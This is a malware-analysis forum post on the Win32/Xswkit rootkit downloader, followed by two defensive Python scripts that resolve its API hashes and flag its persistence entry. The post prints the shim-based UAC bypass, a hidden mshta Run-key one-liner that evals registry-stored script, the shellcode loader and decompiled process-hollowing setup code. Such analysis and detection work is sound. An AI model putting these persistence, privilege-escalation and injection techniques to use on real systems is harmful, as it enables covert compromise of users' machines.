Aerosol

Win32/Xswkit (alias Gootkit)


Credits for the sample go to Tigzy and R136a1; preliminary analysis was done by R136a1.

Win32/Xswkit is another clone of Win32/Poweliks, but with a number of additions, such as an embedded UAC bypass and a different startup method (rundll + mshta.exe). Purpose: malware downloader.

Update 04/01/2015

See viewtopic.php?p=24827#p24827

The UAC bypass is similar to the one used by Gootkit; a reconstruction can be found -> here.

During installation Xswkit builds a shim database patch, drops it to the %temp% folder and executes sdbinst with the -q parameter and the path to the new database. The entry itself is a RedirectEXE shim:

<DATABASE tid="0xf0" typ="LIST">
<TIME tid="0xf6" typ="QWORD">0x1d014b31a06ce99</TIME>
<COMPILER_VERSION tid="0x100" typ="STRINGREF">2.1.0.3</COMPILER_VERSION>
<NAME tid="0x106" typ="STRINGREF">qrywI9lBMKdLH</NAME>
<OS_PLATFORM tid="0x10c" typ="DWORD">0x1</OS_PLATFORM>
<DATABASE_ID tid="0x112" typ="BINARY" len="0x10" guid="1AC61212-7AC0-464A-8B9815BC2854072E" />
<LIBRARY tid="0x128" typ="LIST">
</LIBRARY>
<EXE tid="0x12e" typ="LIST">
<NAME tid="0x134" typ="STRINGREF">cliconfg.exe</NAME>
<APP_NAME tid="0x13a" typ="STRINGREF">nv0NK43fWQ</APP_NAME>
<VENDOR tid="0x140" typ="STRINGREF">Microsoft</VENDOR>
<EXE_ID tid="0x146" typ="BINARY" len="0x10" guid="E6D3E2BF-6CBF-0C43-B41AA519B962860C" />
<MATCHING_FILE tid="0x15c" typ="LIST">
<NAME tid="0x162" typ="STRINGREF">*</NAME>
<COMPANY_NAME tid="0x168" typ="STRINGREF">Microsoft Corporation</COMPANY_NAME>
<INTERNAL_NAME tid="0x16e" typ="STRINGREF">cliconfg.exe</INTERNAL_NAME>
</MATCHING_FILE>
<SHIM_REF tid="0x174" typ="LIST">
<NAME tid="0x17a" typ="STRINGREF">RedirectEXE</NAME>
<COMMAND_LINE tid="0x180" typ="STRINGREF">"C:\Malware\1.exe" -z "C:\Users\UserMan\AppData\Local\Temp\AF293.tmp"</COMMAND_LINE>
</SHIM_REF>
</EXE>
</DATABASE>

[screenshot: B6aPmLyIgAE-UXJ.png]

So the malware installation steps are the following:

1) generate the SDB shim patch and drop it to the %temp% folder

2) register the shim with sdbinst (no UAC prompt on default UAC settings)

3) run the target application -> cliconfg.exe, then terminate itself

4) cliconfg.exe (no UAC prompt on default UAC settings) executes the malicious shim and starts the malware dropper again with the given command-line arguments

5) the dropper installs itself to the system with full admin rights

Below is R136a1's analysis, which he was so kind to share.

1) Set value in Registry:

Key: HKEY_CURRENT_USER\Software

Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)

2) Create Key and set values in Registry:

Key: HKEY_CURRENT_USER\Software\ xsw

Value: binaryImage32 (REG_BINARY) -> Copy of itself

Value: loader (REG_SZ) -> Javascript code

3) Create new process C:\WINDOWS\system32\svchost.exe (Process hijack)

4) Exit old process

5) Set value in Registry:

Key: HKEY_CURRENT_USER\Software

Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)

6) Create Key and set values in Registry:

Key: HKEY_USERS\.DEFAULT\Software\ xsw

Value: binaryImage32 (REG_BINARY) -> Copy of itself

Value: loader (REG_SZ) -> Javascript code

Set Key in Registry:

Key: HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

Value: rundll32 (REG_SZ)

Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

7) Create Key and set values in Registry:

Key: HKEY_USERS\S-1-5-19\Software\ xsw

Value: binaryImage32 (REG_BINARY) -> Copy of itself

Value: loader (REG_SZ) -> Javascript code

Set Key in Registry:

Key: HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run

Value: rundll32 (REG_SZ)

Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

8) Create Key and set values in Registry:

Key: HKEY_USERS\S-1-5-20\Software\ xsw

Value: binaryImage32 (REG_BINARY) -> Copy of itself

Value: loader (REG_SZ) -> Javascript code

Set Key in Registry:

Key: HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run

Value: rundll32 (REG_SZ)

Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

9) Download and install a lot of root certificates

10) Set values in Registry:

Key: HKEY_CURRENT_USER\Software

Value: binaryImage32_0...binaryImage32_5 (REG_BINARY)

Data: ...

11) Inject code into explorer.exe (+ firefox.exe + iexplore.exe after opening)

??? 12) ESENT.dll loading by injected processes ???

13) Create Key and set values in Registry:

Key: HKEY_CURRENT_USER\Software\cxsw

Value: {c1e2bc64-8d94-461f-a485-50a7322bfb4a} (REG_BINARY)

Data: ...

Value: {da14b39e-535a-4b08-9d68-ba6d14fed630} (REG_BINARY)

Data: ...

More from mutex {a1ba4f72-9762-4864-8889-478ac3bdb354}:

https://www.virustotal.com/en/file/658c180654ebfe962c0032a71a8f2b7849ae010599dd3048d24de8f5ff36f06a/analysis/

https://www.virustotal.com/en/file/2baf2050ba223f03f85db4d595e704a593ccef3497f5685f0f59fb315249a5b8/analysis/

More from registry value {d42d0afb-3638-4326-b67b-b0cb954fba94}:

http://totalhash.com/analysis/efd11b782fb2ab225e2231c563f5860c804ece07

http://totalhash.com/analysis/dded6ea7392d35b14347ea06c4cf8acc5b32bcc5

http://totalhash.com/analysis/0bd288047e646fd32ba08db01d56779f02b2befa

http://totalhash.com/analysis/258fc44bdae12f21dd9bdded1ce22cee5850c9c1

http://www.threatexpert.com/report.aspx?md5=18ada38d7a0466240ea9bde1c1d8b956

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AJEH/detailed-analysis.aspx

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Upatre-FM/detailed-analysis.aspx

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AJCH/detailed-analysis.aspx

http://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Mdrop-GDB/detailed-analysis.aspx

The malware uses the Windows tool mshta.exe and DynamicWrapperX:

http://yuripopov.ucoz.net/index/dwx_regaddr_regcode_en/0-27

Let's continue.

The loader script is very big (144 KB) as it contains a copy of mshta.exe, dynwrapx.dll, their manifests and the shellcode; you will find everything in the attachment.

How the malware operates after reboot.

It runs from the Software\Microsoft\Windows\CurrentVersion\Run key by rundll32, which executes the following:

mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

A hidden window with a script that does the next loading stage.

Once executed, it performs the following piece of code, read from the loader registry value at the previous stage:

try {
    // Succeeds only if the DynamicWrapperX COM object is already available on this host
    var DWX = new ActiveXObject("DynamicWrapperX");
    ExecuteShellCode();
    function ExecuteShellCode() {
        // Register the hex-encoded shellcode (ShellcodeHexStr, embedded in the loader)
        // as a callable named executeCode and jump into it
        var CodeAddr = DWX.RegisterCode(ShellcodeHexStr, "executeCode", "i=l", "r=l");
        DWX.executeCode(0);
    }

    Exit();

} catch (e) {
    // DynamicWrapperX could not be created: unpack it and relaunch
    SetupDWX();
}

It attempts to create a new ActiveXObject "DynamicWrapperX", which allows code execution; if that fails, it installs these additions in the SetupDWX routine.

function SetupDWX()
{
    // Unpack the embedded mshta.exe, dynwrapx.dll and their side-by-side manifests
    // into DefaultDir unless they are already there
    if (!FileExists(DefaultDir + "mshta.exe")) UnpackResource("mshta.exe", DefaultDir + "mshta.exe");
    if (!FileExists(DefaultDir + "dynwrapx.dll")) UnpackResource("dynwrapx.dll", DefaultDir + "dynwrapx.dll");
    if (!FileExists(DefaultDir + "dynwrapx.sxs.manifest")) UnpackResource("dynwrapx.sxs.manifest", DefaultDir + "dynwrapx.sxs.manifest");
    if (!FileExists(DefaultDir + "mshta.exe.manifest")) UnpackResource("mshta.exe.manifest", DefaultDir + "mshta.exe.manifest");

    // Relaunch the HTA through the private mshta.exe copy: "<DefaultDir>mshta.exe" "<HTARunCommand>",
    // hidden window (0), without waiting for it to finish (0)
    WshShell.Run('"' + DefaultDir + "mshta.exe\" \"" + HTARunCommand + '"', 0, 0);
    Exit();
}

The shellcode section is also read from the loader registry key and is the final malware startup stage. Its main purpose: read the actual malware body stored in the registry as binaryImageXX value data (where XX is the platform, 32 or 64), start a suspended svchost.exe, unmap its original code, map the malicious payload and run it.

The shellcode uses API hashing and a global shellcode description structure, dynamically allocated during execution.

Below is the API hashing function:

/* djb2 string hash: seed 0x1505, h = h*33 + c, over the export name.
   unsigned long is 32-bit on Windows, so the result wraps at 2^32. */
unsigned long get_hash(char *s)
{
    unsigned long v1 = 0x1505;

    while (*s != 0) {
        v1 += *(unsigned char *)s + (v1 << 5);
        s++;
    }
    return v1;
}

Shell context allocation routine:

struct_v23 *__cdecl CreateShellContext()
{
int hUser32; // eax@4
int v1; // eax@4
int v2; // eax@4
int v4; // [sp+0h] [bp-50h]@1
int v5; // [sp+4h] [bp-4Ch]@1
int v6; // [sp+8h] [bp-48h]@1
int v7; // [sp+Ch] [bp-44h]@1
int v8; // [sp+10h] [bp-40h]@1
int v9; // [sp+14h] [bp-3Ch]@1
int v10; // [sp+18h] [bp-38h]@1
int szAdvapi32; // [sp+1Ch] [bp-34h]@1
int v12; // [sp+20h] [bp-30h]@1
int v13; // [sp+24h] [bp-2Ch]@1
int v14; // [sp+28h] [bp-28h]@1
int szNtdll; // [sp+2Ch] [bp-24h]@1
int v16; // [sp+30h] [bp-20h]@1
int v17; // [sp+34h] [bp-1Ch]@1
int szUser32; // [sp+38h] [bp-18h]@1
int v19; // [sp+3Ch] [bp-14h]@1
int v20; // [sp+40h] [bp-10h]@1
int VirtualAlloc; // [sp+44h] [bp-Ch]@2
int hKernel32; // [sp+48h] [bp-8h]@1
struct_v23 *shell_ctx; // [sp+4Ch] [bp-4h]@1

shell_ctx = 0;
v4 = 'e\0k';
v5 = 'n\0r';
v6 = 'l\0e';
v7 = '2\03';
v8 = 'd\0.';
v9 = 'l\0l';
v10 = 0;
hKernel32 = GetModuleHandle(&v4);
szNtdll = 'ldtn';
v16 = 'ld.l';
v17 = 'l';
szAdvapi32 = 'avda';
v12 = '23ip';
v13 = 'lld.';
v14 = 0;
szUser32 = 'resu';
v19 = 'd.23';
v20 = 'll';
if ( hKernel32 )
{
VirtualAlloc = ApiFromHash(hKernel32, 0x382C0F97u);
if ( VirtualAlloc )
{
shell_ctx = (VirtualAlloc)(0, 0xC4u, 0x3000u, 64);
if ( shell_ctx )
{
shell_ctx->hKernel32 = hKernel32;
shell_ctx->VirtualAlloc = VirtualAlloc;
shell_ctx->VirtualFree = ApiFromHash(shell_ctx->hKernel32, 0x668FCF2Eu);
shell_ctx->Sleep = ApiFromHash(shell_ctx->hKernel32, 0xE19E5FEu);
shell_ctx->LoadLibraryExA = ApiFromHash(shell_ctx->hKernel32, 0x4F803C78u);
shell_ctx->CreateThread = ApiFromHash(shell_ctx->hKernel32, 0x7F08F451u);
shell_ctx->lstrlenA = ApiFromHash(shell_ctx->hKernel32, 0xD2C4AB0Au);
shell_ctx->GetProcAddress = ApiFromHash(shell_ctx->hKernel32, 0xCF31BB1Fu);
shell_ctx->LocalFree = ApiFromHash(shell_ctx->hKernel32, 0xA66DF372u);
shell_ctx->CloseHandle = ApiFromHash(shell_ctx->hKernel32, 0x3870CA07u);
shell_ctx->GetCurrentProcess = ApiFromHash(shell_ctx->hKernel32, 0xCA8D7527u);
shell_ctx->ExpandEnvironmentStringsW = ApiFromHash(shell_ctx->hKernel32, 0x7487495Bu);
shell_ctx->CreateProcessW = ApiFromHash(shell_ctx->hKernel32, 0xAEB52E2Fu);
shell_ctx->GetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0xEBA2CFC2u);
shell_ctx->ReadProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0xB8932459u);
shell_ctx->lstrcatW = ApiFromHash(shell_ctx->hKernel32, 0xD2BFAB79u);
shell_ctx->ResumeThread = ApiFromHash(shell_ctx->hKernel32, 0x74162A6Eu);
shell_ctx->SetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0x7E20964Eu);
shell_ctx->VirtualProtectEx = ApiFromHash(shell_ctx->hKernel32, 0xD812922Au);
shell_ctx->WriteProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0x6F22E8C8u);
shell_ctx->VirtualAllocEx = ApiFromHash(shell_ctx->hKernel32, 0xF36E5AB4u);
shell_ctx->hNtdll = shell_ctx->LoadLibraryExA(&szNtdll, 0, 0);
shell_ctx->RtlCreateHeap = ApiFromHash(shell_ctx->hNtdll, 0xAFAAC189u);
shell_ctx->RtlAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xC0B381DAu);
shell_ctx->RtlReAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xBBC97911u);
shell_ctx->RtlFreeHeap = ApiFromHash(shell_ctx->hNtdll, 0x70BA71D7u);
shell_ctx->NtTerminateThread = ApiFromHash(shell_ctx->hNtdll, 0xAC3C9DC8u);
shell_ctx->RtlDecompressBuffer = ApiFromHash(shell_ctx->hNtdll, 0xF73BBD46u);
shell_ctx->NtOpenKey = ApiFromHash(shell_ctx->hNtdll, 0x4BB73E02u);
shell_ctx->wcslen = ApiFromHash(shell_ctx->hNtdll, 0x24B549F1u);
shell_ctx->NtUnmapViewOfSection = ApiFromHash(shell_ctx->hNtdll, 0x595014ADu);
shell_ctx->hAdvapi32 = shell_ctx->LoadLibraryExA(&szAdvapi32, 0, 0);
shell_ctx->RegOpenKeyExW = ApiFromHash(shell_ctx->hAdvapi32, 0x74A9772u);
shell_ctx->ConvertSidToStringSidW = ApiFromHash(shell_ctx->hAdvapi32, 0x99A22DD7u);
shell_ctx->RegSetValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x345872EAu);
shell_ctx->RegQueryValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x6B95D114u);
shell_ctx->RegOpenKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x74A975Cu);
shell_ctx->RegCreateKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x46CEB39Eu);
shell_ctx->RegCloseKey = ApiFromHash(shell_ctx->hAdvapi32, 0x736B3702u);
shell_ctx->RegEnumKeyA = ApiFromHash(shell_ctx->hAdvapi32, 0xF367EA22u);
shell_ctx->OpenProcessToken = ApiFromHash(shell_ctx->hAdvapi32, 0xC57BD097u);
shell_ctx->GetTokenInformation = ApiFromHash(shell_ctx->hAdvapi32, 0x8ED47F2Cu);
shell_ctx->IsValidSid = ApiFromHash(shell_ctx->hAdvapi32, 0x3D180391u);
hUser32 = (shell_ctx->LoadLibraryExA)(&szUser32, 0, 0);
shell_ctx->MessageBoxA = ApiFromHash(hUser32, 0x384F14B4u);
shell_ctx->wsprintfA = ApiFromHash(hUser32, 0xF898B8C3u);
shell_ctx->wsprintfW = ApiFromHash(hUser32, 0xF898B8D9u);
shell_ctx->hHeap = shell_ctx->RtlCreateHeap(2, 0, 0, 0, 0);
}
}
}
return shell_ctx;
}

and the svchost spawning code:

[screenshot: 1zpn0k6.jpg]

Strings from the actual malware:

RtlCreateUserThread NtClose InternetReadFile HttpOpenRequestA InternetCloseHandle HttpSendRequestA InternetOpenA InternetConnectA HttpQueryInfoA InternetQueryOptionA InternetSetOptionA InternetSetFilePointer HttpAddRequestHeadersA

LastHardwareHash
binaryImage%d
%s_%d
\REGISTRY\USER\%s
\Registry\User
%SystemRoot%\System32\ntdll.dll

RtlDecompressBuffer ntdll.dll RtlComputeCrc32

apphelp.dll

SdbBeginWriteListTag SdbCloseDatabase SdbCloseDatabaseWrite SdbCommitIndexes SdbCreateDatabase SdbDeclareIndex SdbEndWriteListTag SdbFindFirstDWORDIndexedTag SdbFindFirstTag SdbFindNextTag SdbFormatAttribute SdbFreeFileAttributes SdbGetAppPatchDir SdbGetBinaryTagData SdbGetFileAttributes SdbGetFirstChild SdbGetIndex SdbGetMatchingExe SdbGetNextChild SdbGetStringTagPtr SdbGetTagFromTagID SdbInitDatabase SdbIsStandardDatabase SdbMakeIndexKeyFromString SdbOpenApphelpDetailsDatabase SdbOpenApphelpResourceFile SdbOpenDatabase SdbQueryDataExTagID SdbReadApphelpDetailsData SdbReadBinaryTag SdbReadDWORDTag SdbReadQWORDTag SdbReadStringTag SdbRegisterDatabaseEx SdbReleaseDatabase SdbReleaseMatchingExe SdbStartIndexing SdbStopIndexing SdbTagRefToTagID SdbTagToString SdbUnregisterDatabase SdbWriteBinaryTag SdbWriteBinaryTagFromFile SdbWriteDWORDTag SdbWriteNULLTag SdbWriteQWORDTag SdbWriteStringTag SdbWriteWORDTag ShimFlushCache BaseFlushAppcompatCache

generic unknown error
iostream
iostream stream error
system
2.1.0.3

SHGetKnownFolderPath Shell32.dll SHGetSpecialFolderPathW

\Registry\Machine\Software\Microsoft\Cryptography
MachineGuid
\REGISTRY\USER\%s\Software\AppDataLow
\REGISTRY\USER\%s\Software
\REGISTRY\USER\%s\%s
SeRestorePrivilege
-z
cliconfg.exe
sdbinst.exe
abcdefghijklmnopqrstvuwxyzABCDEFGHIJKLMNOPQRSTUVW0123456789_
A
SysWOW64
system32
\
Microsoft
RedirectEXE
Microsoft Corporation
*
"
"
-q "%s"
-q -u "%s"
runas

IsWow64Process

kernel32.dll

explorer.exe chrome.exe opera.exe iexplore.exe lsass.exe firefox.exe LoadLibraryExA kernel32.dll GetProcAddress VirtualProtect VirtualAlloc CreateThread VirtualQuery ZwOpenProcess

%SystemRoot%\System32\
binaryImage32
loader
{d42d0afb-3638-4326-b67b-b0cb954fba94}
windir
%s\system32\cmd.exe
/c "start %s"
desktop.ini
{273b5884-362d-4ff7-8d65-64ac2e7fc291}
\hui
%s\hui%d.exe
{a1ba4f72-9762-4864-8889-478ac3bdb354}
\svchost.exe
svchost.exe

LdrGetProcedureAddress NtAllocateVirtualMemory NtFreeVirtualMemory NtWriteVirtualMemory

F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb

No actual name, except

F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb

I'm curious when they will realize that the /DEBUG option should be turned off in release builds.

The original dropper, unpacked malware, full loader text and extracted shellcode are in the attachment.

VT

original

https://www.virustotal.com/en/file/ed3d622c54b474c6caef540a3147731a1b2c7d4a7563b97731880bb15305d47d/analysis/1420287664/

unpacked

https://www.virustotal.com/en/file/c3885c394a3ad75bc53e7ef2b2d8c8e9e5a12a7f3a52c7399d63814f05c52c96/analysis/1420287667/

No actual detection, only trash.

P.S.

+ the actual loading screenshot; as you can see, Sysinternals Autoruns cannot recognize this entry as rogue; more to say, if you select Verify Digital Signatures it will list it as totally legit.

[screenshot: s4oy20.jpg]

MALWARE

Pass: infected

Source
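The API hashing function quoted in the post is plain djb2 kept to 32 bits, which means the hash constants in the CreateShellContext() listing can be checked against real export names offline. The script below is an added example, not code from the post or from the analysts credited there: it transcribes get_hash(), carries the hash/name pairs copied from the listing, and brute-forces each hash against a candidate list (the listed names plus a few well-known exports that are not in the table, so the resolver has something to reject). Running it prints the resolved name next to the name the decompiler assigned, and any mismatch would show up in verify_listing().

```python
"""Resolve the API hashes used by the Xswkit shellcode.

Added example, not code from the post. get_hash() transcribes the listing
above: djb2 (seed 0x1505, h = h*33 + c) masked to 32 bits, because unsigned
long is 32-bit on Windows. LISTED_HASHES is copied from CreateShellContext().
"""
from typing import Dict, Iterable, List, Optional, Tuple


def get_hash(name: str) -> int:
    """32-bit djb2 over the ASCII export name, exactly as the shellcode computes it."""
    h = 0x1505
    for c in name.encode("ascii"):
        h = (h + c + (h << 5)) & 0xFFFFFFFF
    return h


# (dll, hash constant, name the decompiled listing assigns to that constant)
LISTED_HASHES: List[Tuple[str, int, str]] = [
    ("kernel32", 0x382C0F97, "VirtualAlloc"), ("kernel32", 0x668FCF2E, "VirtualFree"),
    ("kernel32", 0x0E19E5FE, "Sleep"), ("kernel32", 0x4F803C78, "LoadLibraryExA"),
    ("kernel32", 0x7F08F451, "CreateThread"), ("kernel32", 0xD2C4AB0A, "lstrlenA"),
    ("kernel32", 0xCF31BB1F, "GetProcAddress"), ("kernel32", 0xA66DF372, "LocalFree"),
    ("kernel32", 0x3870CA07, "CloseHandle"), ("kernel32", 0xCA8D7527, "GetCurrentProcess"),
    ("kernel32", 0x7487495B, "ExpandEnvironmentStringsW"), ("kernel32", 0xAEB52E2F, "CreateProcessW"),
    ("kernel32", 0xEBA2CFC2, "GetThreadContext"), ("kernel32", 0xB8932459, "ReadProcessMemory"),
    ("kernel32", 0xD2BFAB79, "lstrcatW"), ("kernel32", 0x74162A6E, "ResumeThread"),
    ("kernel32", 0x7E20964E, "SetThreadContext"), ("kernel32", 0xD812922A, "VirtualProtectEx"),
    ("kernel32", 0x6F22E8C8, "WriteProcessMemory"), ("kernel32", 0xF36E5AB4, "VirtualAllocEx"),
    ("ntdll", 0xAFAAC189, "RtlCreateHeap"), ("ntdll", 0xC0B381DA, "RtlAllocateHeap"),
    ("ntdll", 0xBBC97911, "RtlReAllocateHeap"), ("ntdll", 0x70BA71D7, "RtlFreeHeap"),
    ("ntdll", 0xAC3C9DC8, "NtTerminateThread"), ("ntdll", 0xF73BBD46, "RtlDecompressBuffer"),
    ("ntdll", 0x4BB73E02, "NtOpenKey"), ("ntdll", 0x24B549F1, "wcslen"),
    ("ntdll", 0x595014AD, "NtUnmapViewOfSection"),
    ("advapi32", 0x074A9772, "RegOpenKeyExW"), ("advapi32", 0x99A22DD7, "ConvertSidToStringSidW"),
    ("advapi32", 0x345872EA, "RegSetValueExA"), ("advapi32", 0x6B95D114, "RegQueryValueExA"),
    ("advapi32", 0x074A975C, "RegOpenKeyExA"), ("advapi32", 0x46CEB39E, "RegCreateKeyExA"),
    ("advapi32", 0x736B3702, "RegCloseKey"), ("advapi32", 0xF367EA22, "RegEnumKeyA"),
    ("advapi32", 0xC57BD097, "OpenProcessToken"), ("advapi32", 0x8ED47F2C, "GetTokenInformation"),
    ("advapi32", 0x3D180391, "IsValidSid"),
    ("user32", 0x384F14B4, "MessageBoxA"), ("user32", 0xF898B8C3, "wsprintfA"),
    ("user32", 0xF898B8D9, "wsprintfW"),
]

# Candidate export names: everything the listing names, plus a few real exports it
# does not use (so the resolver is exercised on hashes that must NOT match).
CANDIDATES: List[str] = sorted({name for _, _, name in LISTED_HASHES} | {
    "GetModuleHandleA", "ExitProcess", "WinExec", "NtClose", "RtlCreateUserThread",
})


def build_table(names: Iterable[str]) -> Dict[int, str]:
    """Precompute hash -> export name for every candidate."""
    return {get_hash(n): n for n in names}


def resolve(h: int, table: Dict[int, str]) -> Optional[str]:
    """Map one hash constant back to a name, or None if no candidate produces it."""
    return table.get(h & 0xFFFFFFFF)


def verify_listing(entries=LISTED_HASHES) -> List[Tuple[str, int, str, Optional[str]]]:
    """Entries whose hash does not resolve to the name the listing gives them."""
    table = build_table(CANDIDATES)
    return [(dll, h, name, resolve(h, table))
            for dll, h, name in entries if resolve(h, table) != name]


if __name__ == "__main__":
    table = build_table(CANDIDATES)
    for dll, h, name in LISTED_HASHES:
        print(f"{dll:9s} 0x{h:08X} -> {resolve(h, table) or '?':26s} (listing: {name})")
    print("mismatches:", verify_listing() or "none")
```

Because djb2 adds the final character without mixing, A/W export pairs differ by exactly 0x16 (RegOpenKeyExA 0x074A975C vs RegOpenKeyExW 0x074A9772, wsprintfA vs wsprintfW), which is a quick sanity check when you meet this hash in another sample.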

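Since Autoruns shows the Run entry as a legitimately signed mshta.exe launch, a triage script has to look at the command itself rather than the binary. The following added example (not code from the post) flags the traits of the persistence entry described above: mshta started with an inline about: HTA that hides its window, an eval() of script pulled back out of the registry with WScript.Shell.RegRead, a value name borrowed from a system binary that the command does not actually run, and the silent shim-database registration (sdbinst -q) from the installation steps. The sample inputs are constructed; only the "rundll32" entry is the data quoted in the post.

```python
"""Triage Run-key values / command lines for the Xswkit persistence pattern.

Added example, not code from the post. SAMPLE_COMMANDS is constructed; the
"rundll32" entry is the Run value data quoted in the analysis above.
"""
import re
from typing import Dict, List

# A Run value named after a system binary whose command runs something else entirely
# is the "rundll32" -> mshta trick from the post.
SYSTEM_BINARY_NAMES = {"rundll32", "svchost", "explorer", "mshta", "regsvr32"}

XSWKIT_RUN_DATA = (
    r'''mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);'''
    r'''</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell')'''
    r'''.RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"'''
)

# Constructed sample: value name -> command, as read from a Run key or a process-creation log
SAMPLE_COMMANDS: Dict[str, str] = {
    "OneDrive": r'"C:\Users\UserMan\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "rundll32": XSWKIT_RUN_DATA,
    "Updater": r'C:\Windows\System32\sdbinst.exe -q C:\Users\UserMan\AppData\Local\Temp\AF293.tmp',
    "Legit HTA": r'mshta.exe C:\Program Files\Vendor\setup.hta',
}


def analyse_command(name: str, cmd: str) -> List[str]:
    """Return human-readable findings for one (value name, command) pair; empty if clean."""
    low = cmd.lower()
    findings: List[str] = []
    if re.search(r'(^|[\\\s"])mshta(\.exe)?\b', low) and "about:" in low:
        findings.append("mshta runs an inline about: HTA, so there is no .hta file on disk to inspect")
    if "<script" in low and re.search(r"\beval\s*\(", low):
        findings.append("inline script calls eval()")
    if re.search(r"regread\s*\(", low):
        findings.append("next stage is read from the registry via WScript.Shell.RegRead")
    if re.search(r"(moveto|resizeto)\s*\(", low) or "showintaskbar=no" in low:
        findings.append("window is moved off-screen / resized to 0 / hidden from the taskbar")
    base = name.lower()
    base = base[:-4] if base.endswith(".exe") else base
    if base in SYSTEM_BINARY_NAMES and base not in low:
        findings.append(f"value name mimics {base}.exe but the command does not run it")
    if re.search(r'(^|[\\\s"])sdbinst(\.exe)?\b', low) and re.search(r"\s-q\b", low):
        findings.append("silent shim database registration (sdbinst -q)")
    return findings


def scan_commands(commands: Dict[str, str]) -> Dict[str, List[str]]:
    """Run analyse_command over every entry and keep only the ones with findings."""
    report: Dict[str, List[str]] = {}
    for name, cmd in commands.items():
        hits = analyse_command(name, cmd)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan_commands(SAMPLE_COMMANDS).items():
        print(f"[!] {name}")
        for hit in hits:
            print(f"    - {hit}")
```

Feed it the Run values of every loaded hive, including HKU\.DEFAULT, S-1-5-19 and S-1-5-20, since the analysis shows the same entry planted in all of them, and pair the sdbinst check with a look at the custom shim databases registered under AppCompatFlags.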